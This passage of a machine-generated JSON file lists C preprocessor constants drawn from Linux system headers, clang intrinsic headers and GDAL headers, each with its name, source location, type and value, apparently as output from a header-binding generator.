"const", "name": "__BMI2INTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/bmi2intrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__FXSRINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fxsrintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__BIT_TYPES_DEFINED__", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:171:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__BIG_ENDIAN", "ns": 0, "location": "/usr/include/endian.h:32:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4321 }, { "tag": "const", "name": "__LITTLE_ENDIAN", "ns": 0, "location": "/usr/include/endian.h:31:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1234 }, { "tag": "const", "name": "_ENDIAN_H", "ns": 0, "location": "/usr/include/endian.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__BYTE_ORDER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/endian.h:7:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1234 }, { "tag": "const", "name": "__PDP_ENDIAN", "ns": 0, "location": "/usr/include/endian.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3412 }, { "tag": "const", "name": "BIG_ENDIAN", "ns": 0, "location": "/usr/include/endian.h:46:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4321 }, { "tag": "const", "name": "__AVX512VLBWINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbwintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "PDP_ENDIAN", "ns": 0, "location": "/usr/include/endian.h:47:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3412 }, { "tag": "const", "name": "__FLOAT_WORD_ORDER", "ns": 0, "location": "/usr/include/endian.h:41:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1234 }, { "tag": "const", "name": "LITTLE_ENDIAN", "ns": 0, "location": "/usr/include/endian.h:45:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1234 }, { "tag": "const", "name": "BYTE_ORDER", "ns": 0, "location": "/usr/include/endian.h:48:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1234 }, { "tag": "const", "name": "_BITS_BYTESWAP_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/byteswap.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__XSAVEINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__XSAVECINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavecintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_BITS_UINTN_IDENTITY_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/uintn-identity.h:24:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_MM_PCOMCTRL_LT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:319:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_PCOMCTRL_LE", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:320:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "__XSAVESINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsavesintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MM_PCOMCTRL_FALSE", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:325:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 6 }, { "tag": "const", "name": "_MM_PCOMCTRL_TRUE", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:326:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "_MM_PCOMCTRL_GT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:321:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_MM_PCOMCTRL_GE", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:322:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "_MM_PCOMCTRL_EQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:323:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__XSAVEOPTINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xsaveoptintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MM_PCOMCTRL_NEQ", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:324:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 5 }, { "tag": "const", "name": "__CETINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/cetintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__AVX512VLBITALGINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512vlbitalgintrin.h:15:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "EXIT_FAILURE", "ns": 0, "location": "/usr/include/stdlib.h:91:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "MB_CUR_MAX", "ns": 0, "location": "/usr/include/stdlib.h:96:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_MM_FROUND_CEIL", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:30:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "EXIT_SUCCESS", "ns": 0, "location": "/usr/include/stdlib.h:92:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_FROUND_FLOOR", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:29:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_MM_FROUND_NINT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:28:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "RAND_MAX", "ns": 0, "location": "/usr/include/stdlib.h:86:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2147483647 }, { "tag": "const", "name": "_MM_FROUND_NO_EXC", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:26:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "__lldiv_t_defined", "ns": 0, "location": "/usr/include/stdlib.h:81:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_MM_FROUND_RAISE_EXC", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:25:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_MM_FROUND_CUR_DIRECTION", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__ldiv_t_defined", "ns": 0, "location": "/usr/include/stdlib.h:71:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_MM_FROUND_TO_ZERO", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 3 }, { "tag": "const", "name": "__ino_t_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:51:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "__u_char_defined", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:40:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SYS_TYPES_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/types.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_2_PBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:429:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 168 }, { "tag": "const", "name": "_SC_USER_GROUPS_R", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:427:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 167 }, { "tag": "const", "name": "_SC_USER_GROUPS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:425:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 166 }, { "tag": "const", "name": "_MM_FROUND_TO_NEG_INF", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:42:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_SC_2_PBS_TRACK", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:437:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 172 }, { "tag": "const", "name": "_MM_FROUND_TO_POS_INF", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:43:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "_SC_2_PBS_MESSAGE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:435:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 171 }, { "tag": "const", "name": "__SMMINTRIN_H", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/smmintrin.h:11:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_SC_2_PBS_LOCATE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:433:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 170 }, { "tag": "const", "name": "_MM_FROUND_TO_NEAREST_INT", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/avx512fintrin.h:41:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_SC_2_PBS_ACCOUNTING", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:431:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 169 }, { "tag": "const", "name": "_MM_HINT_ET0", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xmmintrin.h:2068:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "_SC_V6_ILP32_OFF32", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:446:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 176 }, { "tag": "const", "name": "_SC_2_PBS_CHECKPOINT", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:443:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 175 }, { "tag": "const", "name": "_SC_STREAMS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:441:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 174 }, { "tag": "const", "name": "_SC_SYMLOOP_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:439:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 173 }, { "tag": "const", "name": "__MATH_DECLARE_LDOUBLE", "ns": 0, "location": "/usr/include/math.h:348:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_CS_XBS5_LPBIG_OFFBIG_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:599:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1113 }, { "tag": "const", "name": "_BITS_PTHREADTYPES_ARCH_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:19:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "S_IWGRP", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:181:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 16 }, { "tag": "const", "name": "S_IXGRP", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:182:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 8 }, { "tag": "const", "name": "_CS_XBS5_LPBIG_OFFBIG_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:601:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1114 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_MUTEX_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:27:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 40 }, { "tag": "const", "name": "S_IRWXG", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:184:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 56 }, { "tag": "const", "name": "S_IROTH", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:186:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_ATTR_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:26:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 56 }, { "tag": "const", "name": "_CS_XBS5_LPBIG_OFFBIG_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:597:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1112 }, { "tag": "const", "name": "S_IWOTH", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:187:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_RWLOCK_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:28:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 56 }, { "tag": "const", "name": "S_IXOTH", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:188:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "S_IRWXO", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:190:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 7 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_BARRIER_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:29:11", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 32 }, { "tag": "const", "name": "_CS_XBS5_LP64_OFF64_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:593:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1110 }, { "tag": "const", "name": "ACCESSPERMS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:195:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 511 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_MUTEXATTR_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:44:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4 }, { "tag": "const", "name": "_CS_XBS5_LP64_OFF64_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:595:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1111 }, { "tag": "const", "name": "ALLPERMS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:196:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 4095 }, { "tag": "const", "name": "_CS_XBS5_LP64_OFF64_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:589:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1108 }, { "tag": "const", "name": "__SIZEOF_PTHREAD_COND_T", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/pthreadtypes-arch.h:45:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 48 }, { "tag": "const", "name": "DEFFILEMODE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:197:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 438 }, { "tag": "const", "name": "_CS_XBS5_LP64_OFF64_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:591:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1109 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFFBIG_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:614:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1120 }, { "tag": "const", "name": "S_BLKSIZE", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:199:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 512 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFFBIG_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:616:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1121 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFF32_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:612:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1119 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFF32_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:608:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1117 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFF32_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:610:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1118 }, { "tag": "const", "name": "_CS_XBS5_LPBIG_OFFBIG_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:603:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1115 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFF32_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:606:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1116 }, { "tag": "const", "name": "_CS_POSIX_V6_LP64_OFF64_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:628:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1127 }, { "tag": "const", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:630:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1128 }, { "tag": "const", "name": "_CS_POSIX_V6_LP64_OFF64_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:624:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1125 }, { "tag": "const", "name": "_CS_POSIX_V6_LP64_OFF64_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:626:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1126 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFFBIG_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:620:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1123 }, { "tag": "const", "name": "_CS_POSIX_V6_LP64_OFF64_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:622:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1124 }, { "tag": "const", "name": "_CS_POSIX_V6_ILP32_OFFBIG_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:618:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1122 }, { "tag": "const", "name": "_MKNOD_VER", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/sys/stat.h:390:10", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 0 }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFF32_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:643:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1134 }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFF32_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:639:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1132 }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFF32_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:641:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1133 }, { "tag": "const", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:634:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1130 }, { "tag": "const", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:636:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1131 }, { "tag": "const", "name": "_CS_POSIX_V6_LPBIG_OFFBIG_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:632:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1129 }, { "tag": "const", "name": "_CS_POSIX_V7_LP64_OFF64_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:657:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1141 }, { "tag": "const", "name": "_CS_POSIX_V7_LP64_OFF64_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:655:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1140 }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFFBIG_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:653:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1139 }, { "tag": "const", "name": "EXPERIMENTAL_CPL_WARN_UNUSED_RESULT", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:74:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 } }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFFBIG_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:651:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1138 }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFFBIG_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:649:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1137 }, { "tag": "const", "name": "_CTYPE_H", "ns": 0, "location": "/usr/include/ctype.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFFBIG_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:647:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1136 }, { "tag": "const", "name": "_CS_POSIX_V7_ILP32_OFF32_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:645:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1135 }, { "tag": "const", "name": "_CS_V6_ENV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:672:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1148 }, { "tag": "const", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:669:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1147 }, { "tag": "const", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:667:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1146 }, { "tag": "const", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_LDFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:665:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1145 }, { "tag": "const", "name": "_CS_POSIX_V7_LPBIG_OFFBIG_CFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:663:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1144 }, { "tag": "const", "name": "_CS_POSIX_V7_LP64_OFF64_LINTFLAGS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:661:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1143 }, { "tag": "const", "name": "_CS_POSIX_V7_LP64_OFF64_LIBS", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:659:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1142 }, { "tag": "const", "name": "_BITS_POSIX2_LIM_H", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:23:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1 }, { "tag": "const", "name": "_POSIX2_BC_BASE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:27:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 99 }, { "tag": "const", "name": "_POSIX2_BC_DIM_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:30:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2048 }, { "tag": "const", "name": "_POSIX2_BC_SCALE_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:33:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 99 }, { "tag": "const", "name": "_POSIX2_BC_STRING_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:36:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 1000 }, { "tag": "const", "name": "_POSIX2_COLL_WEIGHTS_MAX", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/posix2_lim.h:40:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 2 }, { "tag": "const", "name": "VSI_L_OFFSET_MAX", "ns": 0, "location": "/usr/include/gdal/cpl_vsi.h:142:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": -1 }, { "tag": "const", "name": "_CS_V7_ENV", "ns": 0, "location": "/usr/include/x86_64-linux-gnu/bits/confname.h:674:9", "type": { "tag": ":long", "bit-size": 64, "bit-alignment": 64 }, "value": 